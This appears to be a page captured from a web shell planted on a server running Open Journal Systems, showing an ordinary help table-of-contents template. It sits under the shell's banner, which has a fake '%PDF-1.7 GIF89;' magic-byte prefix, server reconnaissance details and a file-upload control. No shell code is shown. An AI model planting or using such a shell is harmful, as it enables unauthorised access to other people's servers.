%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/JetliJournal/templates/help/ |
Upload File : |
{**
* helpToc.tpl
*
* Copyright (c) 2013-2015 Simon Fraser University Library
* Copyright (c) 2000-2015 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Display the help table of contents
*
*}
{strip}
{translate|assign:applicationHelpTranslated key="help.ojsHelp"}
{include file="help/header.tpl"}
{/strip}
<div id="main" style="margin: 0; width: 660px;">
<h4>{$applicationHelpTranslated}</h4>
<div class="thickSeparator"></div>
<div id="breadcrumb">
<a href="{get_help_id key="index.index" url="true"}" class="current">{translate key="navigation.home"}</a>
</div>
<h2>{translate key="help.toc"}</h2>
<div id="content">
<div id="toc">
<ul>
<li><a href="{get_help_id key="index.index" url="true"}">{$applicationHelpTranslated}</a></li>
{foreach from=$helpToc item=topic key=topicId}
<li>{$topic.prefix}<a href="{url page="help" op="view" path=$topicId|explode:"/"}">{$topic.title}</a></li>
{/foreach}
</ul>
</div>
<div class="separator" style="padding-top: 10px;"></div>
<div id="search">
<h4>{translate key="help.search"}</h4>
<form action="{url op="search"}" method="post" style="display: inline">
{translate key="help.searchFor"} <input type="text" name="keyword" size="30" maxlength="60" value="{$helpSearchKeyword|escape}" class="textField" />
<input type="submit" value="{translate key="common.search"}" class="button" />
</form>
</div>
</div>
</div>
{include file="help/footer.tpl"}